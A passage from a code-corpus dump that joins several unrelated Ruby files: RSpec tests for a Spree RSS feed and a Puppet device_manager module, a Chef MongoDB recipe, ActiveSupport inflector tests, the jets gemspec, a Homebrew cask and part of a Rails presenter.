# default locale — falling back to the defaults when none are set.
describe "Set store values in xml feed", type: :feature, js: true do
  stub_authorization!

  let(:store) { Spree::Store.default }

  context "If no preferances are set" do
    it "it renders the default store details correctly" do
      visit "/products.rss"
      expect(page.body).to have_text("<title>Spree Test Store</title>")
      expect(page.body).to have_text("<link>www.example.com</link>")
      expect(page.body).to have_text("<language>#{I18n.locale}</language>")
    end
  end

  context "When custom properties are set" do
    before do
      store.update(url: "www.therubberfactory.com", name: "The Rubber Factory", default_locale: "en-GB")
    end

    it "the feed displays custom title, link and language" do
      visit "/products.rss"
      expect(page.body).to have_text("<title>The Rubber Factory</title>")
      expect(page.body).to have_text("<link>www.therubberfactory.com</link>")
      # Locale is downcased in the feed output ("en-GB" -> "en-gb").
      expect(page.body).to have_text("<language>en-gb</language>")
    end
  end
end
| 31.8125 | 104 | 0.681729 |
0831344d6814798a9b55d6673adf037b9c3de7a5 | 9,695 | require 'spec_helper'
require 'pry'
describe 'device_manager' do
  # Stub classes referenced by the catalogs under test.
  let(:pre_condition) do
    [
      'class cisco_ios {}',
      'class f5 {}',
    ]
  end

  # Declaring the define on a device node itself is an error.
  context 'declared on a device' do
    let(:title) { 'cisco.example.com' }
    let(:params) do
      {
        ensure: :present,
        type: 'cisco_ios',
      }
    end
    let(:facts) do
      {
        os: { family: 'cisco_ios' },
      }
    end

    it { is_expected.to raise_error(%r{declared on a device}) }
  end

  context 'declared on Linux, running Puppet 5.0, with values for all device.conf parameters' do
    let(:title) { 'f5.example.com' }
    let(:params) do
      {
        ensure: :present,
        type: 'f5',
        url: 'https://admin:[email protected]/',
        debug: true,
      }
    end
    let(:facts) do
      {
        aio_agent_version: '5.0.0',
        puppetversion: '5.0.0',
        puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
        puppet_settings_confdir: '/etc/puppetlabs',
        os: { family: 'redhat' },
      }
    end

    it { is_expected.to contain_device_manager(title) }
    it { is_expected.to contain_class('device_manager::conf') }
    it { is_expected.to contain_class('device_manager::fact') }
    it { is_expected.to contain_class('F5') }
  end

  context 'declared on Windows, running Puppet 5.0, with values for all device.conf parameters' do
    let(:title) { 'f5.example.com' }
    let(:params) do
      {
        ensure: :present,
        type: 'f5',
        url: 'https://admin:[email protected]/',
        debug: true,
      }
    end
    let(:facts) do
      {
        aio_agent_version: '5.0.0',
        puppetversion: '5.0.0',
        puppet_settings_deviceconfig: 'C:/ProgramData/PuppetLabs/puppet/etc/device.conf',
        puppet_settings_confdir: 'C:/ProgramData/PuppetLabs/puppet',
        os: { family: 'windows' },
        env_windows_installdir: 'C:\\Program Files\\Puppet Labs\\Puppet',
      }
    end

    it { is_expected.to contain_device_manager(title) }
    it { is_expected.to contain_class('device_manager::conf') }
    it { is_expected.to contain_class('device_manager::fact') }
    it { is_expected.to contain_class('F5') }
  end

  # Puppet < 5.0 has no --target, so the cron entry runs all devices.
  context 'declared on Linux, running Puppet 4.10, with run_interval' do
    let(:title) { 'f5.example.com' }
    let(:params) do
      {
        ensure: :present,
        type: 'f5',
        url: 'https://admin:[email protected]/',
        run_interval: 30,
      }
    end
    let(:facts) do
      {
        aio_agent_version: '4.10.0',
        puppetversion: '4.10.0',
        puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
        puppet_settings_confdir: '/etc/puppetlabs',
        os: { family: 'redhat' },
      }
    end

    it { is_expected.to contain_device_manager(title) }
    it { is_expected.to contain_class('device_manager::conf') }
    it { is_expected.to contain_class('device_manager::fact') }
    it { is_expected.to contain_class('F5') }
    it { is_expected.to contain_device_manager__run__via_cron__device(title) }
    it {
      is_expected.to contain_cron('run puppet device').with(
        'command' => '/opt/puppetlabs/puppet/bin/puppet device --user=root --waitforcert=0 --verbose --logdest syslog',
      )
    }
  end

  # Puppet >= 5.0 supports --target, so each device gets its own cron.
  context 'declared on Linux, running Puppet 5.0, with run_interval' do
    let(:title) { 'f5.example.com' }
    let(:params) do
      {
        ensure: :present,
        type: 'f5',
        url: 'https://admin:[email protected]/',
        run_interval: 30,
      }
    end
    let(:facts) do
      {
        aio_agent_version: '5.0.0',
        puppetversion: '5.0.0',
        puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
        puppet_settings_confdir: '/etc/puppetlabs',
        os: { family: 'redhat' },
      }
    end

    it { is_expected.to contain_device_manager(title) }
    it { is_expected.to contain_class('device_manager::conf') }
    it { is_expected.to contain_class('device_manager::fact') }
    it { is_expected.to contain_class('F5') }
    it { is_expected.to contain_device_manager__run__via_cron__device(title) }
    it {
      is_expected.to contain_cron("run puppet device target #{title}").with(
        'command' => "/opt/puppetlabs/puppet/bin/puppet device --user=root --waitforcert=0 --verbose --logdest syslog --target=#{title}",
        'hour' => '*',
      )
    }
  end

  # On Windows the schedule is a scheduled task (note the sanitized name).
  context 'declared on Windows, running Puppet 5.0, with run_interval' do
    let(:title) { 'f5.example.com' }
    let(:task_name) { 'f5_example_com' }
    let(:params) do
      {
        ensure: :present,
        type: 'f5',
        url: 'https://admin:[email protected]/',
        run_interval: 30,
      }
    end
    let(:facts) do
      {
        aio_agent_version: '5.0.0',
        puppetversion: '5.0.0',
        puppet_settings_deviceconfig: 'C:/ProgramData/PuppetLabs/puppet/etc/device.conf',
        puppet_settings_confdir: 'C:/ProgramData/PuppetLabs/puppet',
        os: { family: 'windows' },
        env_windows_installdir: 'C:\\Program Files\\Puppet Labs\\Puppet',
      }
    end

    it { is_expected.to contain_device_manager(title) }
    it { is_expected.to contain_class('device_manager::conf') }
    it { is_expected.to contain_class('device_manager::fact') }
    it { is_expected.to contain_class('F5') }
    it { is_expected.to contain_device_manager__run__via_scheduled_task__device(title) }
    it {
      is_expected.to contain_scheduled_task("run puppet device target #{task_name}").with(
        'command' => 'C:\\Program Files\\Puppet Labs\\Puppet\\bin\\puppet',
        'arguments' => "device --user=root --waitforcert=0 --verbose --logdest eventlog --target=#{title}",
      )
    }
  end

  # The puppet command is quoted in this Exec to support spaces in the path on Windows.
  context 'declared on Linux, running Puppet 5.0, with run_via_exec' do
    let(:title) { 'f5.example.com' }
    let(:params) do
      {
        ensure: 'present',
        type: 'f5',
        url: 'https://admin:[email protected]/',
        run_interval: 0,
        run_via_exec: true,
      }
    end
    let(:facts) do
      {
        aio_agent_version: '5.0.0',
        puppetversion: '5.0.0',
        puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
        puppet_settings_confdir: '/etc/puppetlabs',
        os: { family: 'redhat' },
      }
    end

    it { is_expected.to contain_device_manager(title) }
    it { is_expected.to contain_class('device_manager::conf') }
    it { is_expected.to contain_class('device_manager::fact') }
    it { is_expected.to contain_class('F5') }
    it { is_expected.to contain_device_manager__run__via_exec__device(title) }
    it {
      is_expected.to contain_exec("run puppet device target #{title}").with(
        'command' => %("/opt/puppetlabs/puppet/bin/puppet" device --user=root --waitforcert=0 --verbose --logdest syslog --target=#{title}),
      )
    }
  end

  # run_interval and run_via_exec cannot be combined.
  context 'declared on Linux, running Puppet 5.0, with run_interval and run_via_exec parameters' do
    let(:title) { 'f5.example.com' }
    let(:params) do
      {
        ensure: :present,
        type: 'f5',
        url: 'https://admin:[email protected]/',
        run_interval: 30,
        run_via_exec: true,
      }
    end
    let(:facts) do
      {
        aio_agent_version: '5.0.0',
        puppetversion: '5.0.0',
        puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
        puppet_settings_confdir: '/etc/puppetlabs',
        os: { family: 'redhat' },
      }
    end

    it { is_expected.to raise_error(%r{are mutually-exclusive}) }
  end

  # Puppet >= 5.5 supports structured credentials written to a per-device
  # config file referenced via a file:// url.
  context 'declared on Linux, running Puppet 5.5, with credentials' do
    let(:title) { 'cisco.example.com' }
    let(:params) do
      {
        ensure: :present,
        type: 'cisco_ios',
        credentials: { 'address' => '10.0.0.245', 'port' => 22, 'username' => 'admin', 'password' => 'cisco', 'enable_password' => 'cisco' },
      }
    end
    let(:facts) do
      {
        aio_agent_version: '5.5.0',
        puppetversion: '5.5.0',
        puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
        puppet_settings_confdir: '/etc/puppetlabs',
        os: { family: 'redhat' },
      }
    end
    let(:device_credentials_file) { "/etc/puppetlabs/puppet/devices/#{title}.conf" }

    it { is_expected.to contain_device_manager(title) }
    it { is_expected.to contain_class('device_manager::conf') }
    it { is_expected.to contain_class('device_manager::fact') }
    it { is_expected.to contain_class('Cisco_ios') }
    # TODO: Identify the rspec syntax for matching an attribute value containing newlines.
    # Or, Identify the rspec syntax for substring matching an attribute value.
    # it {
    #   is_expected.to contain_concat_fragment("device_manager_conf [#{title}]").with('content').including("url file://#{device_credentials_file}")
    # }
  end

  # credentials and url cannot be combined.
  context 'declared on Linux, running Puppet 5.5, with credentials and url parameters' do
    let(:title) { 'cisco.example.com' }
    let(:params) do
      {
        ensure: :present,
        type: 'cisco_ios',
        credentials: { 'address' => '10.0.0.245', 'port' => 22, 'username' => 'admin', 'password' => 'cisco', 'enable_password' => 'cisco' },
        url: 'https://admin:[email protected]/',
      }
    end
    let(:facts) do
      {
        aio_agent_version: '5.5.0',
        puppetversion: '5.5.0',
        puppet_settings_deviceconfig: '/etc/puppetlabs/puppet/device.conf',
        puppet_settings_confdir: '/etc/puppetlabs',
        os: { family: 'redhat' },
      }
    end

    it { is_expected.to raise_error(%r{are mutually-exclusive}) }
  end
| 32.753378 | 147 | 0.614028 |
015c509c2cf00615ecc7dece96bdc9a98b554f80 | 1,269 | #
# Cookbook Name:: sc-mongodb
# Recipe:: configserver
#
# Copyright 2011, edelight GmbH
# Authors:
# Markus Korn <[email protected]>
#
# Copyright 2016-2017, Grant Ridder
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
node.override['mongodb']['is_configserver'] = true
node.override['mongodb']['is_replicaset'] = true
node.override['mongodb']['cluster_name'] = node['mongodb']['cluster_name']
include_recipe 'sc-mongodb::install'
# mongodb_instance will set configsvr = true in the config file.
# http://docs.mongodb.org/manual/reference/configuration-options/#sharded-cluster-options
# we still explicitly set the port and small files.
mongodb_instance node['mongodb']['instance_name']['mongod'] do
mongodb_type 'configserver'
replicaset true
end
| 34.297297 | 89 | 0.754137 |
6184df481fe717eae9df973604c118d4b5d66c71 | 19,780 | require 'abstract_unit'
require 'active_support/inflector'
require 'inflector_test_cases'
require 'constantize_test_cases'
class InflectorTest < ActiveSupport::TestCase
include InflectorTestCases
include ConstantizeTestCases
def test_pluralize_plurals
assert_equal "plurals", ActiveSupport::Inflector.pluralize("plurals")
assert_equal "Plurals", ActiveSupport::Inflector.pluralize("Plurals")
end
def test_pluralize_empty_string
assert_equal "", ActiveSupport::Inflector.pluralize("")
end
ActiveSupport::Inflector.inflections.uncountable.each do |word|
define_method "test_uncountability_of_#{word}" do
assert_equal word, ActiveSupport::Inflector.singularize(word)
assert_equal word, ActiveSupport::Inflector.pluralize(word)
assert_equal ActiveSupport::Inflector.pluralize(word), ActiveSupport::Inflector.singularize(word)
end
end
def test_uncountable_word_is_not_greedy
with_dup do
uncountable_word = "ors"
countable_word = "sponsor"
ActiveSupport::Inflector.inflections.uncountable << uncountable_word
assert_equal uncountable_word, ActiveSupport::Inflector.singularize(uncountable_word)
assert_equal uncountable_word, ActiveSupport::Inflector.pluralize(uncountable_word)
assert_equal ActiveSupport::Inflector.pluralize(uncountable_word), ActiveSupport::Inflector.singularize(uncountable_word)
assert_equal "sponsor", ActiveSupport::Inflector.singularize(countable_word)
assert_equal "sponsors", ActiveSupport::Inflector.pluralize(countable_word)
assert_equal "sponsor", ActiveSupport::Inflector.singularize(ActiveSupport::Inflector.pluralize(countable_word))
end
end
SingularToPlural.each do |singular, plural|
define_method "test_pluralize_singular_#{singular}" do
assert_equal(plural, ActiveSupport::Inflector.pluralize(singular))
assert_equal(plural.capitalize, ActiveSupport::Inflector.pluralize(singular.capitalize))
end
end
SingularToPlural.each do |singular, plural|
define_method "test_singularize_plural_#{plural}" do
assert_equal(singular, ActiveSupport::Inflector.singularize(plural))
assert_equal(singular.capitalize, ActiveSupport::Inflector.singularize(plural.capitalize))
end
end
SingularToPlural.each do |singular, plural|
define_method "test_pluralize_plural_#{plural}" do
assert_equal(plural, ActiveSupport::Inflector.pluralize(plural))
assert_equal(plural.capitalize, ActiveSupport::Inflector.pluralize(plural.capitalize))
end
define_method "test_singularize_singular_#{singular}" do
assert_equal(singular, ActiveSupport::Inflector.singularize(singular))
assert_equal(singular.capitalize, ActiveSupport::Inflector.singularize(singular.capitalize))
end
end
def test_overwrite_previous_inflectors
assert_equal("series", ActiveSupport::Inflector.singularize("series"))
ActiveSupport::Inflector.inflections.singular "series", "serie"
assert_equal("serie", ActiveSupport::Inflector.singularize("series"))
ActiveSupport::Inflector.inflections.uncountable "series" # Return to normal
end
MixtureToTitleCase.each_with_index do |(before, titleized), index|
define_method "test_titleize_mixture_to_title_case_#{index}" do
assert_equal(titleized, ActiveSupport::Inflector.titleize(before), "mixture \
to TitleCase failed for #{before}")
end
end
def test_camelize
CamelToUnderscore.each do |camel, underscore|
assert_equal(camel, ActiveSupport::Inflector.camelize(underscore))
end
end
def test_camelize_with_lower_downcases_the_first_letter
assert_equal('capital', ActiveSupport::Inflector.camelize('Capital', false))
end
def test_camelize_with_underscores
assert_equal("CamelCase", ActiveSupport::Inflector.camelize('Camel_Case'))
end
def test_acronyms
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym("API")
inflect.acronym("HTML")
inflect.acronym("HTTP")
inflect.acronym("RESTful")
inflect.acronym("W3C")
inflect.acronym("PhD")
inflect.acronym("RoR")
inflect.acronym("SSL")
end
# camelize underscore humanize titleize
[
["API", "api", "API", "API"],
["APIController", "api_controller", "API controller", "API Controller"],
["Nokogiri::HTML", "nokogiri/html", "Nokogiri/HTML", "Nokogiri/HTML"],
["HTTPAPI", "http_api", "HTTP API", "HTTP API"],
["HTTP::Get", "http/get", "HTTP/get", "HTTP/Get"],
["SSLError", "ssl_error", "SSL error", "SSL Error"],
["RESTful", "restful", "RESTful", "RESTful"],
["RESTfulController", "restful_controller", "RESTful controller", "RESTful Controller"],
["IHeartW3C", "i_heart_w3c", "I heart W3C", "I Heart W3C"],
["PhDRequired", "phd_required", "PhD required", "PhD Required"],
["IRoRU", "i_ror_u", "I RoR u", "I RoR U"],
["RESTfulHTTPAPI", "restful_http_api", "RESTful HTTP API", "RESTful HTTP API"],
# misdirection
["Capistrano", "capistrano", "Capistrano", "Capistrano"],
["CapiController", "capi_controller", "Capi controller", "Capi Controller"],
["HttpsApis", "https_apis", "Https apis", "Https Apis"],
["Html5", "html5", "Html5", "Html5"],
["Restfully", "restfully", "Restfully", "Restfully"],
["RoRails", "ro_rails", "Ro rails", "Ro Rails"]
].each do |camel, under, human, title|
assert_equal(camel, ActiveSupport::Inflector.camelize(under))
assert_equal(camel, ActiveSupport::Inflector.camelize(camel))
assert_equal(under, ActiveSupport::Inflector.underscore(under))
assert_equal(under, ActiveSupport::Inflector.underscore(camel))
assert_equal(title, ActiveSupport::Inflector.titleize(under))
assert_equal(title, ActiveSupport::Inflector.titleize(camel))
assert_equal(human, ActiveSupport::Inflector.humanize(under))
end
end
def test_acronym_override
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym("API")
inflect.acronym("LegacyApi")
end
assert_equal("LegacyApi", ActiveSupport::Inflector.camelize("legacyapi"))
assert_equal("LegacyAPI", ActiveSupport::Inflector.camelize("legacy_api"))
assert_equal("SomeLegacyApi", ActiveSupport::Inflector.camelize("some_legacyapi"))
assert_equal("Nonlegacyapi", ActiveSupport::Inflector.camelize("nonlegacyapi"))
end
def test_acronyms_camelize_lower
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym("API")
inflect.acronym("HTML")
end
assert_equal("htmlAPI", ActiveSupport::Inflector.camelize("html_api", false))
assert_equal("htmlAPI", ActiveSupport::Inflector.camelize("htmlAPI", false))
assert_equal("htmlAPI", ActiveSupport::Inflector.camelize("HTMLAPI", false))
end
def test_underscore_acronym_sequence
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym("API")
inflect.acronym("JSON")
inflect.acronym("HTML")
end
assert_equal("json_html_api", ActiveSupport::Inflector.underscore("JSONHTMLAPI"))
end
def test_underscore
CamelToUnderscore.each do |camel, underscore|
assert_equal(underscore, ActiveSupport::Inflector.underscore(camel))
end
CamelToUnderscoreWithoutReverse.each do |camel, underscore|
assert_equal(underscore, ActiveSupport::Inflector.underscore(camel))
end
end
def test_camelize_with_module
CamelWithModuleToUnderscoreWithSlash.each do |camel, underscore|
assert_equal(camel, ActiveSupport::Inflector.camelize(underscore))
end
end
def test_underscore_with_slashes
CamelWithModuleToUnderscoreWithSlash.each do |camel, underscore|
assert_equal(underscore, ActiveSupport::Inflector.underscore(camel))
end
end
def test_demodulize
assert_equal "Account", ActiveSupport::Inflector.demodulize("MyApplication::Billing::Account")
assert_equal "Account", ActiveSupport::Inflector.demodulize("Account")
assert_equal "", ActiveSupport::Inflector.demodulize("")
end
def test_deconstantize
assert_equal "MyApplication::Billing", ActiveSupport::Inflector.deconstantize("MyApplication::Billing::Account")
assert_equal "::MyApplication::Billing", ActiveSupport::Inflector.deconstantize("::MyApplication::Billing::Account")
assert_equal "MyApplication", ActiveSupport::Inflector.deconstantize("MyApplication::Billing")
assert_equal "::MyApplication", ActiveSupport::Inflector.deconstantize("::MyApplication::Billing")
assert_equal "", ActiveSupport::Inflector.deconstantize("Account")
assert_equal "", ActiveSupport::Inflector.deconstantize("::Account")
assert_equal "", ActiveSupport::Inflector.deconstantize("")
end
def test_foreign_key
ClassNameToForeignKeyWithUnderscore.each do |klass, foreign_key|
assert_equal(foreign_key, ActiveSupport::Inflector.foreign_key(klass))
end
ClassNameToForeignKeyWithoutUnderscore.each do |klass, foreign_key|
assert_equal(foreign_key, ActiveSupport::Inflector.foreign_key(klass, false))
end
end
def test_tableize
ClassNameToTableName.each do |class_name, table_name|
assert_equal(table_name, ActiveSupport::Inflector.tableize(class_name))
end
end
# FIXME: get following tests to pass on jruby, currently skipped
#
# Currently this fails because ActiveSupport::Multibyte::Unicode#tidy_bytes
# required a specific Encoding::Converter(UTF-8 to UTF8-MAC) which unavailable on JRuby
# causing our tests to error out.
# related bug http://jira.codehaus.org/browse/JRUBY-7194
def test_parameterize
jruby_skip "UTF-8 to UTF8-MAC Converter is unavailable"
StringToParameterized.each do |some_string, parameterized_string|
assert_equal(parameterized_string, ActiveSupport::Inflector.parameterize(some_string))
end
end
def test_parameterize_and_normalize
jruby_skip "UTF-8 to UTF8-MAC Converter is unavailable"
StringToParameterizedAndNormalized.each do |some_string, parameterized_string|
assert_equal(parameterized_string, ActiveSupport::Inflector.parameterize(some_string))
end
end
def test_parameterize_with_custom_separator
jruby_skip "UTF-8 to UTF8-MAC Converter is unavailable"
StringToParameterizeWithUnderscore.each do |some_string, parameterized_string|
assert_equal(parameterized_string, ActiveSupport::Inflector.parameterize(some_string, '_'))
end
end
def test_parameterize_with_multi_character_separator
jruby_skip "UTF-8 to UTF8-MAC Converter is unavailable"
StringToParameterized.each do |some_string, parameterized_string|
assert_equal(parameterized_string.gsub('-', '__sep__'), ActiveSupport::Inflector.parameterize(some_string, '__sep__'))
end
end
def test_classify
ClassNameToTableName.each do |class_name, table_name|
assert_equal(class_name, ActiveSupport::Inflector.classify(table_name))
assert_equal(class_name, ActiveSupport::Inflector.classify("table_prefix." + table_name))
end
end
def test_classify_with_symbol
assert_nothing_raised do
assert_equal 'FooBar', ActiveSupport::Inflector.classify(:foo_bars)
end
end
def test_classify_with_leading_schema_name
assert_equal 'FooBar', ActiveSupport::Inflector.classify('schema.foo_bar')
end
def test_humanize
UnderscoreToHuman.each do |underscore, human|
assert_equal(human, ActiveSupport::Inflector.humanize(underscore))
end
end
def test_humanize_without_capitalize
UnderscoreToHumanWithoutCapitalize.each do |underscore, human|
assert_equal(human, ActiveSupport::Inflector.humanize(underscore, capitalize: false))
end
end
def test_humanize_by_rule
ActiveSupport::Inflector.inflections do |inflect|
inflect.human(/_cnt$/i, '\1_count')
inflect.human(/^prefx_/i, '\1')
end
assert_equal("Jargon count", ActiveSupport::Inflector.humanize("jargon_cnt"))
assert_equal("Request", ActiveSupport::Inflector.humanize("prefx_request"))
end
def test_humanize_by_string
ActiveSupport::Inflector.inflections do |inflect|
inflect.human("col_rpted_bugs", "Reported bugs")
end
assert_equal("Reported bugs", ActiveSupport::Inflector.humanize("col_rpted_bugs"))
assert_equal("Col rpted bugs", ActiveSupport::Inflector.humanize("COL_rpted_bugs"))
end
def test_constantize
run_constantize_tests_on do |string|
ActiveSupport::Inflector.constantize(string)
end
end
def test_safe_constantize
run_safe_constantize_tests_on do |string|
ActiveSupport::Inflector.safe_constantize(string)
end
end
def test_ordinal
OrdinalNumbers.each do |number, ordinalized|
assert_equal(ordinalized, number + ActiveSupport::Inflector.ordinal(number))
end
end
def test_ordinalize
OrdinalNumbers.each do |number, ordinalized|
assert_equal(ordinalized, ActiveSupport::Inflector.ordinalize(number))
end
end
def test_dasherize
UnderscoresToDashes.each do |underscored, dasherized|
assert_equal(dasherized, ActiveSupport::Inflector.dasherize(underscored))
end
end
def test_underscore_as_reverse_of_dasherize
UnderscoresToDashes.each_key do |underscored|
assert_equal(underscored, ActiveSupport::Inflector.underscore(ActiveSupport::Inflector.dasherize(underscored)))
end
end
def test_underscore_to_lower_camel
UnderscoreToLowerCamel.each do |underscored, lower_camel|
assert_equal(lower_camel, ActiveSupport::Inflector.camelize(underscored, false))
end
end
def test_symbol_to_lower_camel
SymbolToLowerCamel.each do |symbol, lower_camel|
assert_equal(lower_camel, ActiveSupport::Inflector.camelize(symbol, false))
end
end
%w{plurals singulars uncountables humans}.each do |inflection_type|
class_eval <<-RUBY, __FILE__, __LINE__ + 1
def test_clear_#{inflection_type}
with_dup do
ActiveSupport::Inflector.inflections.clear :#{inflection_type}
assert ActiveSupport::Inflector.inflections.#{inflection_type}.empty?, \"#{inflection_type} inflections should be empty after clear :#{inflection_type}\"
end
end
RUBY
end
def test_inflector_locality
ActiveSupport::Inflector.inflections(:es) do |inflect|
inflect.plural(/$/, 's')
inflect.plural(/z$/i, 'ces')
inflect.singular(/s$/, '')
inflect.singular(/es$/, '')
inflect.irregular('el', 'los')
end
assert_equal('hijos', 'hijo'.pluralize(:es))
assert_equal('luces', 'luz'.pluralize(:es))
assert_equal('luzs', 'luz'.pluralize)
assert_equal('sociedad', 'sociedades'.singularize(:es))
assert_equal('sociedade', 'sociedades'.singularize)
assert_equal('los', 'el'.pluralize(:es))
assert_equal('els', 'el'.pluralize)
ActiveSupport::Inflector.inflections(:es) { |inflect| inflect.clear }
assert ActiveSupport::Inflector.inflections(:es).plurals.empty?
assert ActiveSupport::Inflector.inflections(:es).singulars.empty?
assert !ActiveSupport::Inflector.inflections.plurals.empty?
assert !ActiveSupport::Inflector.inflections.singulars.empty?
end
def test_clear_all
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
# ensure any data is present
inflect.plural(/(quiz)$/i, '\1zes')
inflect.singular(/(database)s$/i, '\1')
inflect.uncountable('series')
inflect.human("col_rpted_bugs", "Reported bugs")
inflect.clear :all
assert inflect.plurals.empty?
assert inflect.singulars.empty?
assert inflect.uncountables.empty?
assert inflect.humans.empty?
end
end
end
def test_clear_with_default
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
# ensure any data is present
inflect.plural(/(quiz)$/i, '\1zes')
inflect.singular(/(database)s$/i, '\1')
inflect.uncountable('series')
inflect.human("col_rpted_bugs", "Reported bugs")
inflect.clear
assert inflect.plurals.empty?
assert inflect.singulars.empty?
assert inflect.uncountables.empty?
assert inflect.humans.empty?
end
end
end
Irregularities.each do |singular, plural|
define_method("test_irregularity_between_#{singular}_and_#{plural}") do
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
inflect.irregular(singular, plural)
assert_equal singular, ActiveSupport::Inflector.singularize(plural)
assert_equal plural, ActiveSupport::Inflector.pluralize(singular)
end
end
end
end
Irregularities.each do |singular, plural|
define_method("test_pluralize_of_irregularity_#{plural}_should_be_the_same") do
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
inflect.irregular(singular, plural)
assert_equal plural, ActiveSupport::Inflector.pluralize(plural)
end
end
end
end
Irregularities.each do |singular, plural|
define_method("test_singularize_of_irregularity_#{singular}_should_be_the_same") do
with_dup do
ActiveSupport::Inflector.inflections do |inflect|
inflect.irregular(singular, plural)
assert_equal singular, ActiveSupport::Inflector.singularize(singular)
end
end
end
end
[ :all, [] ].each do |scope|
ActiveSupport::Inflector.inflections do |inflect|
define_method("test_clear_inflections_with_#{scope.kind_of?(Array) ? "no_arguments" : scope}") do
# save all the inflections
singulars, plurals, uncountables = inflect.singulars, inflect.plurals, inflect.uncountables
# clear all the inflections
inflect.clear(*scope)
assert_equal [], inflect.singulars
assert_equal [], inflect.plurals
assert_equal [], inflect.uncountables
# restore all the inflections
singulars.reverse.each { |singular| inflect.singular(*singular) }
plurals.reverse.each { |plural| inflect.plural(*plural) }
inflect.uncountable(uncountables)
assert_equal singulars, inflect.singulars
assert_equal plurals, inflect.plurals
assert_equal uncountables, inflect.uncountables
end
end
end
%w(plurals singulars uncountables humans acronyms).each do |scope|
ActiveSupport::Inflector.inflections do |inflect|
define_method("test_clear_inflections_with_#{scope}") do
with_dup do
# clear the inflections
inflect.clear(scope)
assert_equal [], inflect.send(scope)
end
end
end
end
# Dups the singleton and yields, restoring the original inflections later.
  # Use this in tests that modify the state of the singleton.
#
# This helper is implemented by setting @__instance__ because in some tests
# there are module functions that access ActiveSupport::Inflector.inflections,
# so we need to replace the singleton itself.
def with_dup
original = ActiveSupport::Inflector::Inflections.instance_variable_get(:@__instance__)
ActiveSupport::Inflector::Inflections.instance_variable_set(:@__instance__, original.dup)
ensure
ActiveSupport::Inflector::Inflections.instance_variable_set(:@__instance__, original)
end
end
| 37.820268 | 163 | 0.716279 |
bfd3af0b71f955152deeeb1ab72d395f7c905fbe | 2,365 | # coding: utf-8
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "jets/version"
require "jets/rdoc"
Gem::Specification.new do |spec|
spec.name = "jets"
spec.version = Jets::VERSION
spec.authors = ["Tung Nguyen"]
spec.email = ["[email protected]"]
spec.summary = "Ruby Serverless Framework on AWS Lambda"
spec.description = "Jets is a framework that allows you to create serverless applications with a beautiful language: Ruby. It includes everything required to build an application and deploy it to AWS Lambda. Jets makes serverless accessible to everyone."
spec.homepage = "http://rubyonjets.com"
spec.license = "MIT"
spec.required_ruby_version = '~> 2.5'
spec.rdoc_options += Jets::Rdoc.options
vendor_files = Dir.glob("vendor/**/*")
gem_files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features|docs)/})
end
spec.files = gem_files + vendor_files
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency "actionpack", ">= 5.2.1"
spec.add_dependency "actionview", ">= 5.2.1"
spec.add_dependency "activerecord", ">= 5.2.1"
spec.add_dependency "activesupport", ">= 5.2.1"
spec.add_dependency "aws-sdk-cloudformation"
spec.add_dependency "aws-sdk-cloudwatchlogs"
spec.add_dependency "aws-sdk-dynamodb"
spec.add_dependency "aws-sdk-lambda"
spec.add_dependency "aws-sdk-s3"
spec.add_dependency "aws-sdk-sns"
spec.add_dependency "colorize"
spec.add_dependency "dotenv"
spec.add_dependency "hashie"
spec.add_dependency "json"
spec.add_dependency "kramdown"
spec.add_dependency "memoist"
spec.add_dependency "mimemagic"
spec.add_dependency "rack"
spec.add_dependency "railties", ">= 5.2.1" # ActiveRecord database_tasks.rb require this
spec.add_dependency "recursive-open-struct"
spec.add_dependency "text-table"
spec.add_dependency "thor"
spec.add_dependency "gems" # lambdagem dependency
spec.add_development_dependency "byebug"
spec.add_development_dependency "bundler"
spec.add_development_dependency "rake"
spec.add_development_dependency "rspec"
end
| 39.416667 | 258 | 0.709091 |
79cb50e364f94704f492a6e8b4f5dcee3cf4ba0d | 464 | class GmailNotifr < Cask
version '0.9.0'
sha256 '47ecf1edf08678e6a1c53cb5a3e39d5c6c5f63a9145fc7cbc7df2ebada42b662'
url "https://s3.amazonaws.com/assets.ashchan.com/gmailnotifr/GmailNotifr-#{version}.zip"
appcast 'https://s3.amazonaws.com/assets.ashchan.com/gmailnotifr/update.xml'
homepage 'http://ashchan.com/projects/gmail-notifr'
license :unknown
app 'Gmail Notifr.app'
zap :delete => '~/Library/Preferences/com.ashchan.GmailNotifr.plist'
end
| 35.692308 | 90 | 0.775862 |
28efcdc244640daf925087d047357525c7b7ce56 | 2,484 | DocumentFilterPresenter = Struct.new(:filter, :context, :document_decorator) do
extend Whitehall::Decorators::DelegateInstanceMethodsOf
delegate_instance_methods_of Whitehall::DocumentFilter::Filterer, to: :filter
def as_json(options = nil)
as_hash(options)
end
def as_hash(_options = nil)
data = {
count: documents.count,
current_page: documents.current_page,
total_pages: documents.total_pages,
total_count: documents.total_count,
results: documents.each_with_index.map { |d, i| { result: d.as_hash, index: i + 1 } },
results_any?: documents.any?,
result_type: result_type,
no_results_title: context.t('document_filters.no_results.title'),
no_results_description: context.t('document_filters.no_results.description'),
no_results_tna_heading: context.t('document_filters.no_results.tna_heading'),
